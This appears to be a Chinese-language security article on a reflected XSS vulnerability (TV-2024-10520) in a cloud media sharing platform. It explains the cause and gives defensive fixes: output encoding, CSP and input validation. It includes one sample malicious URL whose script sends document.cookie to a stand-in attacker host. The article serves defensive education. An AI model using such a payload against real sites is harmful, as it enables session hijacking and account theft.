前言：連結點下去，帳號就沒了？

2024 年末，台灣電腦網路危機處理暨協調中心（TWCERT/CC）發布了一則關於**大塚資訊科技（Otsu Information Technology）**所營運的「雲端媒體分享平台」的安全通報。該平台被證實存在一個 Reflected Cross-Site Scripting (XSS) 漏洞，編號為 TV-2024-10520。

對於企業用戶而言，雲端媒體平台通常存放著內部培訓影片或行銷素材，一旦遭受 XSS 攻擊，不僅可能導致管理員 Session 被劫持，更可能成為釣魚攻擊的跳板。

技術解構：為什麼 `title` 參數會變成後門？

本次漏洞的核心在於**「輸入驗證缺失」與「前端渲染配置不當」**的雙重失誤。

1. 漏洞成因分析

根據 TWCERT/CC 的通報與技術分析，該平台的「分享內容」頁面在處理 URL 參數（如 title）時，後端 PHP 程式未對特殊字元進行 HTML 實體編碼（Entity Encoding），直接將內容回傳給前端。

而前端（推測使用 Vue.js 或類似框架）在接收到資料後，使用了類似 v-html 或未經處理的模板語法將其渲染至 DOM 中。這導致瀏覽器無法區分「文字標題」與「可執行腳本」。

2. 攻擊 Payload 模擬

攻擊者只需構造如下的惡意連結，並透過社交工程手法誘騙使用者點擊：

# 惡意 URL 範例
https://share.platform.com/view?title=%3Cscript%3Efetch('https://hacker.com/steal?c='%2bdocument.cookie)%3C/script%3E

當受害者點擊後，伺服器回傳的 JSON 或 HTML 片段中包含了未轉義的 <script> 標籤，瀏覽器隨即執行該代碼，將使用者的 Cookie 發送至攻擊者伺服器。

風險評估與影響

雖然反射型 XSS 需要使用者互動（點擊連結），但其危害不容小覷：

Session 劫持 (Session Hijacking)： 攻擊者可取得 JSESSIONID 或 PHPSESSID，直接接管使用者帳戶。
釣魚頁面注入： 攻擊者可利用 DOM 操作，在合法網域下覆蓋一個假的「登入視窗」，誘騙使用者輸入密碼。
強制操作： 利用受害者的身分，在背景發送刪除檔案或修改設定的 API 請求（CSRF）。

防禦與修補策略

針對此類漏洞，大塚資訊科技已釋出修補版本。對於開發類似架構（PHP + 前端框架）的工程師，建議採取以下防護措施：

1. 嚴格的輸出編碼 (Output Encoding)

這是防禦 XSS 的黃金法則。無論輸入來源為何，在輸出至瀏覽器時必須進行編碼。

PHP 端： 使用 htmlspecialchars($input, ENT_QUOTES, 'UTF-8')。
前端框架： 避免使用 v-html (Vue) 或 dangerouslySetInnerHTML (React)，盡量使用預設會轉義的資料綁定方式（如 {{ title }}）。

2. 導入內容安全策略 (CSP)

設定 HTTP Header Content-Security-Policy，限制瀏覽器只能執行來自特定網域的腳本，並禁止 inline-script。

Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted.cdn.com; object-src 'none';

3. 輸入驗證 (Input Validation)

對於 title 這類欄位，應限制其長度並過濾掉 <、>、" 等危險字元，只允許純文字輸入。

漏洞摘要表 (TV-2024-10520)

項目	內容
漏洞編號	TV-2024-10520
受影響產品	大塚資訊科技 – 雲端媒體分享平台
漏洞類型	Reflected Cross-Site Scripting (XSS)
嚴重度	High (CVSS V3)
攻擊向量	透過遠端未經身分驗證的攻擊者，發送特製 URL 觸發。
修補建議	更新至官方最新版本，並啟用 WAF 防護。